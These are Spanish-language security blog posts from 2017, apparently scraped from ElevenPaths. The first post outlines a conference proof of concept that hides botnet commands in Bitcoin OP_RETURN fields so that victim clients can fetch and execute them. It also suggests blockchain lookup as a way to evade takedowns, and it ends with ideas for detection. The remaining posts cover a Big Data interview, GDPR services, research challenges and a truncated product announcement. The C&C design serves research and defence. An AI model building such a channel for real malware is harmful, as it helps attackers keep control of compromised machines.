La tecnología Blockchain ha cambiado todo para siempre. Desde enero de 2009, cuando se registró la primera operación en la cadena de bloques de Bitcoin, han surgido cada vez más aplicaciones que hacen uso de esta tecnología más allá de utilizarla como un registro de operaciones de pago. Sin embargo, no existen demasiadas publicaciones que se han atrevido a darle una vuelta para identificar potenciales usos maliciosos. Con este objetivo se presentó en EuskalHack la charla Make This Last Forever: Blockchain-based C&C. Antes de la aparición de Blockchain, los desarrolladores de aplicaciones maliciosas debían buscar diferentes formas para que el C&C estuviera siempre accesible con el objetivo de que las víctimas supieran dónde encontrar las órdenes a ejecutar. Han pasado de utilizar chats IRC y servidores web a redes sociales para ocultar la comunicación del C&C en un bosque de información legítima existente enviada por usuarios legítimos. En este sentido, a principio del mes de junio la empresa de seguridad ESET descubrió que el grupo Turla utilizaba el perfil de Britney Spears para la publicación del C&C aprovechando que damos por hecho que este tipo de redes sociales siempre permanecerán accesibles. Pero Blockchain ya habría solucionado (sin querer) el objetivo de la perpetuidad de la comunicación que estarían buscando los administradores de una botnet con sus víctimas. En 2013, fue incorporada la funcionalidad del 0P_RETURN en donde se puede almacenar una pequeña parte de información (hasta 80 bytes) en la cadena de bloques. Tras deserializar una transacción podríamos acudir al campo scriptPubKey y convertir de haxadecimal a ASCII el contenido de dicho campo con el objetivo de saber cuál es la información incrustada. En plataformas como Coin Secrets, ya se dedican a enumerar los mensajes que se incluyen en las distintas transacciones registradas en la cadena de bloques de Bitcoin. Figura 1. Ejemplo de información incorporado en una transacción en la cadena de bloques. La prueba de concepto que preparamos para ilustrar la charla tendría dos fases. La primera, una aplicación en Python que permitiría al admin hacer una transacción incluyendo la orden a ejecutar en el campo OP_RETURN. La segunda, dos clientes en JavaScript y en Python destinados a ejecutar las órdenes almacenadas en la cadena de bloques que, en esta prueba de concepto serían consultadas por las víctimas a través de plataformas de terceros que facilitan dicha información como, por ejemplo, blockexplorer.com. De esta manera, y dado que la información una vez anclada en la blockchain es muy difícil de eliminar, el administrador podría actualizar el listado de órdenes de forma recurrente. Figura 2. Esquema de comunicación del admin con las víctimas. Otro caso que podría darse es el uso de Blockchain para la resolución de dominios. Tal y como publicamos en este blog a principios de año, la agencia de noticias AMAQ de Estado Islámico habría utilizado extensiones de navegador para facilitar a sus seguidores el acceso a sus páginas web. En el caso de que se quisiera evadir cualquier tipo de censura, el campo 0P_RETURN podría utilizarse en el caso de que se quisiera que los seguidores supieran en todo momento a qué webs deberían conectarse. En el caso de que dicho servidor dejara de estar disponible, el admin únicamente tendría que realizar una nueva transacción que añadir a la cadena de bloques donde se publicara a través de OP_RETURN la nueva URL a la que conectarse. Figura 3. Esquema de comunicación del admin con sus seguidores. Las demos que pusimos en la prueba de concepto estaban realizadas sobre la testnet de Bitcoin. Sin embargo, existen otros proyectos menos conocidos por el gran público, que también podrían utilizarse con un objetivo similar. En concreto, Namecoin cuya cadena de bloques puede almacenar hasta 520 bytes de información, o Ethereum que es una plataforma de computación distribuida que implementa funciones de contratos inteligentes de forma nativa ampliando los casos de uso de la tecnología, o incluso Bitmessage como protocolo de comunicación descentralizado y cifrado. Lo que sí que parece claro es que la tecnología ofrece posibilidades interesantes. Es cuestión de tiempo que un threat actor llegue a implementar este tipo de comunicación a sabiendas que existe poco margen para su detección. En muchos casos, la aspiración pasaría por identificar peticiones a proveedores de información de la cadena de bloques, compartir información sobre direcciones vinculadas a muestras de malware vistas en el pasado o, del mismo modo que Coinsecrets, monitorizar la información expuesta mediante la funcionalidad del OP_RETURN. Félix Brezo Intelligence Analyst at ElevenPaths @febrezo felix.brezo@11paths.com Yaiza Rubio Intelligence Analyst at ElevenPaths @yrubiosec yaiza.rubio@11paths.com
29 de junio de 2017
Entrevista: Angela Shen-Hsieh desmitifica“la caja negra” del Big Data
Angela Shen-Hsieh es Directora de Predicción del Comportamiento Humano en la Innovación de Productos de Telefónica. En esta función, se encarga de liderar la innovación interna. Antes de unirse a Telefónica en noviembre, Angela trabajó en IBM Watson, administrando las líneas de productos de inteligencia de conversación y descubrimiento de datos, y fue fundadora y directora general de varias startups de visualización de datos. Angela fue entrenada como arquitecta, recibiendo su Maestría en Arquitectura de la Universidad de Harvard. Nos sentamos con Angela para hablar de su papel en la intersección de Inteligencia Artificial, Aprendizaje Automático y Big Data. ¿Cómo empezaste con tecnologías como la IA, el Machine Learning y el Big Data, sobre todo teniendo en cuenta tu experiencia en arquitectura? En realidad, empecé a través del diseño. Dirigí varias compañías que diseñaban interfaces de usuario para datos, y esto se convirtió en una competencia en torno a desmitificar la caja negra de los análisis para que las personas encargadas de tomar decisiones pudieran actuar sobre los datos con confianza. Uno de los problemas es que los análisis pueden ser misteriosos, así que trabajamos mucho en los sistemas de apoyo para la toma de decisiones internas. Por ejemplo, si colocas un número en un tablero o se lo das a una persona encargada de tomar decisiones y que no pueda desentrañarlo, es difícil que tengan confianza. No pueden mirarlo y entender todas sus implicaciones. Digamos, por ejemplo, que un número concreto es rojo. ¿Por qué es rojo? ¿Cuánto tiempo ha sido rojo? ¿Seguirá siendo rojo si restringimos los datos y excluimos este proyecto, un país o esta línea de productos? Este es un problema de visualización interactiva fundamental, necesario para entender realmente de qué manera las personas utilizamos los análisis. Ahí es donde entra en juego el aspecto del diseño. Los arquitectos no construimos edificios, sino que hacemos imágenes de edificios. Así que los arquitectos son expertos en representación visual. Ese es el mismo enfoque que tomamos para hacer que los datos fueran más fáciles de leer para las personas de negocios. Esto hizo que se crearan aplicaciones que podían proporcionar análisis a los consumidores para ayudarles a mejorar su salud o mejorar otro tipo de comportamiento. Figura 1: AI y Machine Learning son herramientas claves para Big Data. ¿Cuáles son algunos de los mayores obstáculos que encuentra en el uso de la IA y el Machine Learning para innovar con el Big Data? El obstáculo más grande es el propio Big Data. El término "Big Data" hace mucho tiempo que existe, pero eso no significa que sea realmente tan accesible como uno cree. Todavía existen los mismos retos de inteligencia empresarial que ha habido siempre: datos que no están estandarizados, que no están armonizados, que no están limpios o que no están completos. Es difícil de averiguar y es muy manual. Así que el Machine Learning y la IA ofrecen esta automatización, pero en realidad todavía hay mucho trabajo manual. Esto es uno de los retos. Otro reto es que, en la organización de productos, tenemos que averiguar cómo monetizamos el Big Data y este tipo de tecnologías. Una cosa es construir una solución a medida, y otra cosa completamente diferente es comercializar un producto que se puede vender a muchos clientes en volumen y escala: en lugar de 50 clientes con un pago cada uno de 100.000 €, ¿cómo deberíamos erguir un negocio con 500.000 clientes que cada uno gasta 100 € al mes? Hay todo tipo de retos más allá de resolver solo el problema técnico en el machine learning de si los datos pueden contar la historia que usted espera o no. En IBM Watson lo vi de cerca. Estábamos intentando adoptar esta increíble tecnología que ganó el juego de preguntas y respuestas de televisión Jeopardy! y erigir un gran negocio respondiendo a preguntas de servicio al cliente o buscar lo imposible en la literatura médica y mucho más. Hubo muchos falsos comienzos, un montón de desafíos alrededor de las expectativas de los usuarios, alrededor del enfoque, una gran presión para ganar dinero haciendo todo esto, y todo ello mientras el mercado se estaba moviendo para hacer más cómodas estas capacidades de consulta de lenguaje natural. Para comercializar datos e IA/ML, hay que solucionar un problema más amplio. ¿Qué la trajo a Telefónica? Vine a Telefónica por dos razones: los datos y el proceso de innovación. Aunque IBM tiene una extensión y recursos increíbles como compañía de 450.000 personas, hay cosas que Telefónica tiene e IBM no. La primera son los datos. Básicamente, este tipo de tecnologías requiere una dieta constante de datos para sobrevivir y mejorar. Estaba muy intrigada por las posibilidades y la extensión y riqueza de los datos que Telefónica tiene a su disposición. La segunda es el proceso de innovación en Telefónica. Me impresionó mucho lo bien pensado que está: estructurado, pero con un montón de espacio para experimentar y aportar nuevas ideas y personas. No todas las grandes empresas tienen esta manera de pensar y se necesita un tipo muy especial de enfoque y diferentes tipos de personas para coger las cosas que pueden ser herramientas de investigación y convertirlas en productos comerciales. Este proceso me impresionó y por este motivo el área en que más me gusta trabajar es la innovación, que yo sitúo entre la investigación más académica y el desarrollo de productos. Cuéntanos más sobre tu papel como directora de predicción del comportamiento humano en Telefónica. ¿Puede hablarnos de alguno de los proyectos actuales que le emocionen especialmente? ¡Hay muchas cosas que me emocionan! Esta área había empezado de una forma bastante amplia, pidiendo ideas a toda la organización (que es la manera correcta). Estamos en un momento en el que, con la cuarta plataforma, podemos construir productos con más facilidad y necesitamos poner los proyectos en un enfoque común. Conservamos las cosas buenas del proceso de innovación que tenemos, pero las hacemos más enfocadas para poder causar un mayor impacto. El enfoque que tenemos en predecir el comportamiento humano es lo que llamamos "experiencia cognitiva del cliente" es decir, cómo traemos datos contextuales para mejorar las interacciones con los clientes en todo el ciclo de vida de compromiso del cliente. Pueden ser cosas tanto internas como externas, todo con una mirada hacia lo que será el próximo mercado de negocios que Telefónica pueda capitalizar en torno a los datos. ¿Cuál es el futuro de la publicidad tal y como la conocemos, agentes inteligentes, robots, cómo se realizan las compras y las transacciones, cómo se realiza el servicio al cliente…? Todas estas cosas van a mejorar. La inteligencia parte de la inteligencia artificial y vendrá a través de una mejor comprensión del cliente y su contexto que viene a través de datos. Así que nos estamos enfocando en permitir que esto suceda. ¿Cómo ves la IA y el Machine Learning cambiando la forma en que usamos el Big Data? En palabras sencillas, la mayoría de los análisis tradicionales han estado centrados en el pasado. Miran hacia atrás e intentan decirle cosas sobre el pasado que tal vez podría aplicar al futuro. Debido a que estas tecnologías aprenden con el tiempo y pueden hacer correlaciones y entendimientos que realmente no son tan visibles, deberíamos poder reaccionar más rápido, ser más proactivos y predecir más el futuro, y entonces podríamos ser más prescriptivos. Como alguien que pasó décadas construyendo tableros de mando que eran en su mayoría reactivos, esta es una evolución de cambio importante. La otra cosa es que hay una línea muy fina, cuando hablamos de IA y Machine Learning, entre datos estructurados y no estructurados, y esto es muy importante. La industria ha estado intentando encontrar la manera de unir esas dos cosas, pero provienen de bases tecnológicas muy diferentes. Los datos estructurados y no estructurados no funcionan bien juntos en los métodos tradicionales de inteligencia empresarial o de búsqueda empresarial. El contenido y los datos no hablan entre sí. Sin embargo, para el usuario final hay poca diferencia entre una respuesta a una pregunta como "¿Cuál es el nombre de la esposa de Harrison Ford?" y otra como "¿Cuánto mide Harrison Ford?" Piensan en eso como información o datos y, de hecho, estas palabras se usan indistintamente por la mayoría de las personas. Pero en términos de tecnologías, almacenamos esas respuestas de forma muy diferente (en una base de datos frente a un sistema de gestión de contenido) y seguimos las respuestas dependiendo de cómo almacenamos los datos (consulta frente a búsqueda). Pero el uso de IA y Machine Learning junto con el Big Data tiene el objetivo de unir datos estructurados y no estructurados. Figura 2: La perspectiva de reunir datos estructurados y no estructurados puede mejorar enormemente las capacidades de datos. ¿Cuáles son las mayores áreas de potencial sin explotar para el Big Data? En el Machine Learning y la IA hay muchas técnicas emergentes como el aprendizaje profundo y las redes neurales. Por parte de los negocios, creo que va a haber sindicación de datos a través de un mercado o sistema de red. ¡O eso o dejamos que Google y Amazon tomen el control del mundo! En términos de casos de uso y cosas tangibles que sentiremos, estoy más interesada en cómo las cosas pueden ayudar a las personas. Estamos en una batalla en la economía de la atención, por lo que ello significaría hacer las cosas más libres de fricción, más personales y relevantes, y mirando cómo las cosas se pueden hacer con menos intervención y menos conexión manual de los puntos. En este momento, como consumidores todavía tenemos que conectar un montón de puntos para llegar de extremo a extremo mediante cualquier transacción. ¿Cómo puede esto tener menos fricción y hacerse de una forma más segura y fácil? También estoy interesada en los tipos de casos de uso en los que el Big Data realmente puede ayudarme en algo que me costaría mucho conseguir. Cosas como comer mejor y hacer el ejercicio correcto. Estamos investigando otras áreas como aplicar esto al comportamiento en línea y al comportamiento del uso del teléfono móvil. Las personas hablan de lo decepcionadas que están con ellas mismas porque no pueden dejar Snapchat o Facebook. Tristan Harris, que es más conocido por su papel en la ética del diseño de Google, ha creado un "movimiento" llamado Time Well Spent (tiempo bien invertido). Habla sobre cómo estamos obligados porque se han desarrollado técnicas para hacernos adictos, y una vez que una aplicación utiliza esta técnica, las otras aplicaciones también tienen que hacerlo porque todas están compitiendo por nuestra escasa atención. Así que tal vez podamos usar el Big Data para darle la vuelta. Si podemos obligar y predecir nuestro comportamiento humano, deberíamos ser capaces de devolver estos datos para ayudarnos a mejorar nuestro comportamiento y otros aspectos de nuestras vidas y de nosotros mismos.
28 de junio de 2017
Qué hemos presentado en Security Day 2017 (VI): La solución de Telefónica para el cumplimiento de RGPD
Durante el Security Day, ElevenPaths, la unidad de ciberseguridad de Telefónica, presentó la solución que ayuda al cumplimiento del nuevo reglamento de protección de datos que el 25 de mayo de 2018 entrará en vigor. En un artículo anterior describimos en detalle las novedades del reglamento, así como la norma completa. Vídeo de la ponencia de David Prieto, Responsable Global de los Servicios de Seguridad Gestionada y Seguridad de Red de ElevenPaths, durante el Security Day: El proceso de construcción de una solución de RGPD que cubra todas las coyunturas del articulado no es tarea fácil. Esto se deriva a dos razones: la complejidad y exigencia del propio reglamento y la necesidad de adecuarlo a la idiosincrasia de cada organización. Por esta razón, partimos del convencimiento de que no existe la poción mágica de Panoramix que nos otorgue una fuerza sobrenatural, sino que el cumplimiento normativo solo puede construirse mediante una detallada planificación, una ejecución comprometida y la selección justa y necesaria de los servicios de protección del dato y la seguridad. En ElevenPaths, tras un concienzudo análisis de la norma, hemos concluido que lo más adecuado es un plan de entrenamiento en cuatro fases que nos conduzca en último término a poder llegar a la meta del RGPD. Este modelo se inicia con un proceso de reconocimiento previo de las facultades internas sobre protección de datos para descubrir cuanto de lejos estamos de la forma física necesaria para terminar la maratón. Tras este análisis, se debe proceder a definir un plan de entrenamiento e implantar las herramientas que faciliten el seguimiento diario de este. A partir de este momento ya estamos listos para comenzar a entrenar las dos facultades necesarias para la carrera de RGPD: la privacidad y la seguridad. Evaluación Esta primera fase del proceso consiste en la comprensión de la norma y de cómo afecta de manera particular a la empresa. La primera tarea es inferir el gap regulatorio a partir de las medidas ya implantadas para la protección de datos. Es imprescindible averiguar cuáles son los tratamientos de datos personales que se llevan a cabo en la organización y una vez conocidos los datos que se están procesando y cómo se realiza el procesamiento, podremos identificar: Los incumplimientos respecto a la norma Si existe la necesidad de elaborar una EIPD (Evaluación del Impacto en la Protección de los Datos Personales) para el tratamiento Si existe la necesidad de contar con un DPD (Delegado de Protección de Datos Personales) La consecuencia de esta evaluación será un plan de acción compuesto por las tareas necesarias para alcanzar un nivel de cumplimiento óptimo. El plan de acción nos facilitará la construcción de un caso de negocio, que sirva a la organización para estimar el coste de cumplir la norma, el cual ha de incluir, entre otras cosas, los recursos que se deben incorporar, la formación al personal y los servicios de protección y seguridad que se requiere contratar. Puesto que RGPD presenta numerosas dificultades, colegimos que la mejor aproximación es contratar una asesoría experta que colabore con el DPD en el discernimiento de las necesidades inmediatas, de las de más largo plazo y, por último, a construir el plan de adecuación. De esta manera, es posible ahorrar costes de formación específica a personal interno y conseguir las máximas garantías de calidad. De acuerdo a este principio, Telefónica ofrece un equipo experto de consultoría multidisciplinar para cumplimiento normativo a través de Govertis, que con la colaboración de las oficinas técnicas de Telefónica podrán garantizar que las organizaciones instauren y ejecuten la protección de datos de la manera más efectiva y adecuada a sus obligaciones particulares. Este equipo multidisciplinar incluye tanto consultores, técnicos expertos en la implantación de Sistemas de Gestión de la Seguridad y abogados especializados en TI con una gran experiencia en privacidad y protección de datos. Gobernanza Tras el análisis previo, el siguiente paso es definir e implantar los procesos necesarios para lograr el cumplimiento continuo de la norma. El cumplimiento no puede ser una actividad puntual que se desarrolle dentro de una ventana de tiempo y que posteriormente se abandone. Debe formar parte de los procesos de la organización y ser tenido en cuenta desde la misma concepción del proceso productivo de la organización. Este concepto se conoce en el nuevo reglamento como protección de datos desde el diseño y por defecto. Además, el cumplimiento debe ser revisado periódicamente ya que las organizaciones no son entidades estáticas. Los objetivos de negocio cambian, cambian los procesos internos, las tecnologías utilizadas y también las personas implicadas. Además, los propios textos normativos están vivos y son modificados con regularidad. Por lo tanto, la utilización de un sistema de gestión permite estructurar las actividades de cumplimiento y facilitar iteraciones sobre el mismo para implantar un plan de mejora continua y también evidenciar frente al regulador que se cumple el reglamento. SandaS GRC es la plataforma de gestión del cumplimiento que permitirá desarrollar este sistema de gestión dentro de una secuencia iterable en las fases Plan, Do, Check y Act. Dentro de este esquema, la fase de Plan está alineada con la etapa de evaluación y, como hemos visto anteriormente, se trata de identificar el gap de cumplimiento para planificar las actividades de adecuación dentro. Ese plan de acción se ejecuta en la fase de Do. El registro de actividades del tratamiento se obtendrá directamente desde SandaS GRC con toda la información registrada en la fase de Plan. Además, en esta fase se elaborarán y aprobarán los procedimientos pertinentes y se implantarán las medidas de seguridad planificadas incluyendo, entre otros, los servicios de monitorización de seguridad para identificar las brechas de seguridad. Regularmente, y aunque la nueva norma ya no prescribe una periodicidad mínima para las auditorías de cumplimiento, convendrá comprobar si los controles (medidas de seguridad implementadas) siguen en vigor y su nivel de efectividad. También este será el momento de comprobar si ha habido cambios significativos en la organización que hayan quedado fuera de la huella del cumplimiento (nuevos servicios, nuevas sedes, nuevos procesos, etcétera). SandaS GRC ofrece un módulo de evaluación del cumplimiento que facilita la fase de Check de cada control de la norma a cualquier nivel (global a la organización, para un conjunto de tratamientos o para un tratamiento individual). También permite seleccionar un conjunto de controles y enviar un formulario de evaluación a la persona que encargada de responder. Como resultado de estos controles periódicos obtenemos: Una actualización del nivel de cumplimiento Un plan de mejora En la última fase Act, ejecutamos el plan de mejora prescrito en la fase anterior de Check. Para conseguir una mejora continua del sistema de gestión, este ciclo se ha de repetir, normalmente con una periodicidad anual, aunque dependerá de las circunstancias particulares de cada organización. Privacidad Esta fase conlleva la implantación de procesos y servicios que permitan a la organización garantizar la legitimidad del proceso y los derechos del ciudadano (acceso, migración y olvido) y cumplir con lo que se conoce como seguridad del proceso, que se corresponde con la confidencialidad de los datos de los ciudadanos. Está íntimamente ligada con el desarrollo de la EIPD acometido en la fase de evaluación, puesto que los tratamientos de datos de carácter personal identificados en esa fase previa deben ser supervisados en este momento para garantizar que, en ningún momento, los datos de carácter personal sean utilizados para algo que no se haya explícitamente informado al ciudadano. Es lo que se conoce como legitimidad del proceso. Por tanto, es necesario implantar unas medidas de vigilancia tanto de los procesos como sobre los datos para detectar posibles deficiencias del propio proceso, descubrir otros tratamientos que no han sido previamente identificados o incluso actuaciones que por despiste o mala fe impliquen una utilización de los datos más allá del conocimiento del DPO y no contemplados por el EIPD. En detalle, estas medidas incluyen el descubrimiento, para identificar datos personales que han escapado del proceso de análisis y el posible proceso asociado, o tratamientos no autorizados para datos ya registrados ( Data Discovery), y también la trazabilidad para conocer en todo momento donde se está almacenando la información ( Data Traceability) para que en el momento que el ciudadano solicite ejercer sus derechos sobre los datos, la organización pueda proporcionarlos sin dilación alguna. Para dar solución a esta problemática, Telefónica incluye en su portafolio el servicio de Data Management, el cual permite la recolección y almacenaje en una plataforma centralizada de cualquier tipo de eventos generados por dispositivos finales, sistemas de TI, equipamiento de seguridad o aplicaciones. Con el servicio de Data Management, puesto que incluye funcionalidades de correlación y un motor de creación de indicadores, se facilita la visibilidad, trazabilidad y control sobre los datos personales involucrados en los procesos de la organización. Este servicio se integra con SandaS GRC para poder hacer un seguimiento con datos reales y de cómo se están aplicando las políticas de cumplimiento. Así, a partir de la información generada por los sistemas de información donde tienen lugar los tratamientos de datos, Data Management da respuesta a preguntas como: ¿qué datos personales tengo en mis sistemas?, ¿dónde se encuentran?, ¿quién es el responsable?, ¿cómo se utilizan? En definitiva, detectar usos incorrectos, información redundante o fuera del sistema de cumplimiento. En segundo lugar, la norma también determina que las organizaciones deben implementar las medidas técnicas y organizativas para asegurar un apropiado nivel de seguridad de acuerdo con el riesgo, y entre las cuales se incluye: la seudonimización y el cifrado de datos personales; la capacidad de garantizar la confidencialidad, integridad, disponibilidad y resiliencia permanentes de los sistemas y servicios de tratamiento; la capacidad de restaurar la disponibilidad y el acceso a los datos personales de forma rápida en caso de incidente físico o técnico; un proceso de verificación, evaluación y valoración regulares de la eficacia de las medidas técnicas y organizativas para garantizar la seguridad del tratamiento. Estas medidas comprenden una amplia gama de situaciones, por lo que una vez más vemos la necesidad imperiosa de realizar una adecuada evaluación (EIPD si se dan las circunstancias de que así se requiera) de las condiciones de la empresa para así concluir cuales son las medidas apropiadas según el riesgo. Telefónica ofrece servicios muy variados en su portafolio para cubrir la mayor parte de estas medidas, desde seguridad en la red, protección de entornos y aplicaciones en la nube y datacenters, hasta protección del puesto de trabajo, servicios de cifrado de correo electrónico o Data Loss protection. El procedimiento adecuado es identificar en la fase de análisis cuales son las medidas necesarias de acuerdo al riesgo y la idiosincrasia de la empresa y después buscar la solución del mercado que mejor se adecúe. Seguridad Uno de los aspectos novedosos de la norma es el tratamiento de las brechas y filtraciones de datos de carácter personal, los cuales deben de ser notificados en unos plazos extremadamente cortos tanto al regulador como al ciudadano. Esta fase está íntimamente relacionada con el análisis de riesgos realizado en la fase de assessment el cual determina las medidas de seguridad adecuadas. De acuerdo al tipo de datos que la organización maneje, su volumen, el riesgo de ser un blanco de ataques las medidas de protección son diferentes, desde las más básicas hasta sistemas avanzados basados en big data o machine learning. Se debe entender que el reglamento no especifica si se ha de instalar un cortafuego o un SIEM, sino que las medidas deben estar de acuerdo a la Evaluación de Impacto relativa a la Protección de Datos (EIPD) realizado. Telefónica cuenta con una amplia experiencia en esta área de prevención, detección de brechas y monitorización continua y por tanto dispone de una serie de servicios que se adecúan a las posibles necesidades identificadas en la fase de evaluación. Por un lado, ofrece un conjunto de servicios de ciberseguridad, entre los cuales se incluyen los sistemas de prevención –como auditorias de seguridad y análisis de vulnerabilidades de infraestructuras o aplicaciones–, así como los sistemas detección avanzada, el control de la cadena de proveedores y el análisis continuo del ciberespacio para detectar filtraciones de datos. Y por otro lado, los servicios de seguridad gestionada, para la monitorización y notificación inmediata de incidentes de seguridad, soportados mediante la plataforma SandaS y operados por los SOCs de Telefónica, y de los cuales es posible encontrar información adicional en el siguiente enlace. *También te puede interesar: Security Day 2017_ Cyber Security beats ElevenPaths anuncia que su plataforma de seguridad cumple con el nuevo Reglamento Europeo de Protección de Datos con un año de antelación Qué hemos presentado en Security Day 2017 (I): Cómo vivimos WannaCry Qué hemos presentado en el Security Day 2017 (II): detección de amenazas móviles con nuestro partner Check Point Qué hemos presentado en Security Day 2017 (III): autenticación mediante la tecnología Mobile Connect para nuestro partner OpenCloud Factory Qué hemos presentado en Security Day 2017 (IV): intercambiamos información de ciberamenazas con Cyber Threat Alliance Qué hemos presentado en Security Day 2017 (V): adiós Path6, hola mASAPP Qué hemos presentado en Security Day 2017 (VI): La solución de Telefónica para el cumplimiento de RGPD Qué hemos presentado en Security Day 2017 (VII): El Ayuntamiento de Alcobendas apuesta por encuestas electrónicas basadas en Blockchain Qué hemos presentado en Security Day 2017 (VIII): Hack your attitude, entrega de premios del concurso de plugin Latch 2016 Qué hemos presentado en Security Day 2017 (IX): Technology Experience sobre ciberincidentes como WannaCry Qué hemos presentado en Security Day (X): Startups y emprendedores en ciberseguridad como CounterCraft Juan Antonio Gil Belles Jefe de producto en Riesgo y Cumplimiento @breggovic juanantonio.gil@11paths.com Francisco Oteiza Lacalle Jefe de producto en Seguridad Gestionada @Fran_Oteiza francisco.oteizalacalle@telefonica.com David Prieto Marqués Gerente de Seguridad Gestionada y Seguridad en red @DaPriMar david.prietomarques@telefonica.com
27 de junio de 2017
ElevenPaths participa en los retos científicos de las JNIC 2017: Buscamos equipos de investigación
Como anunciamos tiempo atrás, ElevenPaths participa junto al INCIBE y el Ministerio de Defensa en el Track de Transferencia de las Jornadas Nacionales de Investigación en Ciberseguridad (JNIC) 2017, organizadas por la Universidad Rey Juan Carlos. Desde el día 10 de junio, ya está abierta a la comunidad científica la inscripción a los retos de investigación para proponer vuestras soluciones y enfoques. Una oportunidad óptima para trabajar estrechamente con nosotros y resolver grandes necesidades del sector de la ciberseguridad. ElevenPaths, ha colaborado desde el primer momento en esta iniciativa ocupando un rol activo como retadores, cuya labor ha consistido en la elaboración de un conjunto de propuestas de retos científicos de interés que puedan ser abordados por la comunidad investigadora nacional. Pero además, de cara a apoyar plenamente este proceso, formamos parte del comité de supervisión de este Track de Transferencia, velando para que los retos propuestos adquieran un balance adecuado entre el interés científico, objetivos a cumplir, impacto y adecuadas vías de explotación de los resultados. Las JNIC fueron el escenario escogido para presentar esta propuesta de cooperación entre el sector privado y el académico con el pleno apoyo de INCIBE. Unas jornadas donde los máximos exponentes de la ciberseguridad nacional se dieron cita y que se presentaba como un escenario óptimo al que trasladar el mensaje de nuestra iniciativa. Describimos una serie de necesidades reales de diversos sectores empresariales y gubernamentales a los equipos científicos, explicando en términos realistas para la comunidad académica los objetivos a cumplir, teniendo en consideración las capacidades científicas y tecnológicas de los investigadores que opten a su ejecución. Los diferentes retos exponen algunas de las necesidades localizadas en distintos ámbitos de nuestras áreas de ciberseguridad. Esto quiere decir que surgen como intereses o requisitos y, por tanto, nuestra implicación y colaboración con los equipos de investigación está más que justificada. Somos los primeros interesados en obtener unos avances científicos de calidad, por tanto, estableceremos un diálogo individual con cada equipo, estudiando todos las opciones que estén en nuestra manos durante la ejecución para que las soluciones a los retos obtengan su mejor expresión y forma. Toda la información del Track de Transferencia y los retos están publicadas en la propia web de las JNIC. Ahí se encuentran encontrar la documentación, las bases del certamen, las plantillas necesarias y los retos ampliamente descritos y caracterizados. Describimos brevemente a continuación los tres retos que hemos propuesto desde ElevenPaths: Análisis y correlación en Android de PUPs & Adware: Actualmente el software potencialmente malicioso (Potential Unwanted Program/Application – PUP/PUA) y el Adware están presentes en gran parte de las aplicaciones disponibles en los repositorios comerciales. Tal es su expansión que este tipo de software y sus acciones se han convertido en las actividades más incómodas e intrusivas de cara a los usuarios. En este sentido, los desarrolladores de PUPs y Adware utilizan técnicas cada vez más agresivas y avanzadas gracias a la permisividad que se les confiere, ya que en ocasiones su software no se clasifica como malware y están amparadas en un marco legal válido y protegido. Esta propuesta tiene un marcado carácter científico para el equipo implicado puesto que inicialmente centra el foco en la generación de una serie de publicaciones, informes y deducciones que permitan elevar el grado de conocimiento respecto a PUPs y Adware existente en markets de aplicaciones móviles. El equipo de investigación dispondrá de libertad a la hora de decidir cuál será su enfoque y procedimiento para realizar el procesado de datos obtenidos en Tacyt. Autenticación continua e identificación adaptativa en dispositivos móviles: Los mecanismos de identificación y control de acceso han adquirido una importancia crucial a la hora de habilitar o impedir el acceso a los dispositivos y a las aplicaciones. En concreto, una adecuada autenticación de los usuarios permite gestionar los privilegios y derechos de uso de SmartPhones y evitar un uso indebido sin autorización del propietario. Pero a su vez gracias a la constante validación de la identidad del usuario se puede facilitar la gestión de elementos de seguridad, permitiendo incluso que los usuarios no tengan que depender constantemente del uso de contraseñas, pines o factores adicionales de autenticación. Esta propuesta plantea al equipo de investigación el diseño de un mecanismo de identificación y autenticación continua de usuarios, realizando un análisis de manera desapercibida durante el uso cotidiano de dispositivos móviles, tales como SmartPhones o Tablets. Debido a la gran variedad de recursos tecnológicos, de comportamiento y biométricos se valorarán aquellas propuestas que realmente puedan proporcionar una solución práctica y usable, no intrusiva y que no requiera de una elevación de privilegios en el dispositivo, algo que resultaría inviable de cara a la comercialización. Técnicas de análisis del alcance e impacto de los incidentes de ciberseguridad en las empresas: Este reto trata de abordar la problemática real existente en sectores corporativos a la hora de cuantificar los daños y el impacto que podría provocar o ha provocado un incidente de ciberseguridad. Este análisis del impacto debe combinar un estudio que permita parametrizar una serie de variables correspondientes a la configuración empresarial, con unos modelos matemáticos que permitan realizar una valoración comprensible por los clientes y que integre un proceso de aprendizaje para mejorar sus capacidades analíticas. Todo esto enmarcado en un enfoque lo más automatizado posible y que debe poder efectuar tanto una evaluación anticipada como posterior de manera aproximada pero justificada. En ningún caso se esperan análisis forenses ni tampoco una verificación formal de cumplimiento normativo para realizar la estimación del impacto. Los equipos de investigación que aborden estas propuestas no deben limitar su enfoque científico ni acotar su ambición tecnológica a los términos expresados por los retos si esto supone un perjuicio de cara a las expectativas alcanzables por los investigadores. Siempre se valorará positivamente la incorporación de factores de valor diferenciales que permitan trazar una hoja de ruta mucho más ambiciosa. Para ello establecemos un contacto estrecho y constante con el sector académico y docente de donde surge el conocimiento más innovador en este sentido. No perdáis esta oportunidad de participar si pertenecéis a la comunidad científica y os interesa cooperar con nosotros e iniciar un camino conjunto en investigación en tecnologías innovadoras aplicadas a la ciberseguridad. Innovación y laboratorio www.elevenpaths.com
26 de junio de 2017
Path6 ya tiene nombre. Hola mASAPP, nuestra nueva herramienta que ayuda a mejorar la seguridad móvil
Quedan lejos los tiempos en los que las apps eran un terreno acotado específicamente a las promociones y juegos, pequeños divertimentos sin ninguna pretensión. Hoy en día las aplicaciones móviles conforman una pieza clave dentro del tejido empresarial, dotando a las organizaciones de un valor diferencial dentro de su estrategia de canal para la adquisición, retención y relación con sus clientes. En ElevenPaths hemos sido conscientes de esta tendencia desde bien atrás, razón por la cual desarrollamos hace ya más de tres años Tacyt, nuestra plataforma de ciberinteligencia para ecosistemas móviles que pretendía ayudar a nuestros clientes en sus investigaciones sobre aplicaciones sospechosas dirigidas contra sus organizaciones. Y precisamente apoyados en Tacyt, descubrimos que los problemas en el mundo móvil no venían derivados únicamente de apps de terceros maliciosas dirigidas a impactar sobre el negocio del cliente. Desde el equipo de investigación de ElevenPaths comenzamos a investigar nuestras aplicaciones oficiales, y propusimos a nuestros clientes analizar las suyas propias, en búsqueda de vulnerabilidades y otros errores de seguridad que pudieran representar un riesgo para sus usuarios o la propia organización. Y vaya si los descubrimos: Aplicaciones olvidadas por la organización con hasta cuatro años de antigüedad, fugas de información sensible que revelaban datos muy “aprovechables” sobre la infraestructura de la compañía, servicios internos empleados por la organización incluyendo en claro usuarios, contraseñas, tokens y otros parámetros de autenticación; vulnerabilidades críticas que permitían a otras aplicaciones de terceros instaladas en el dispositivo del cliente acceder e interactuar de una forma no 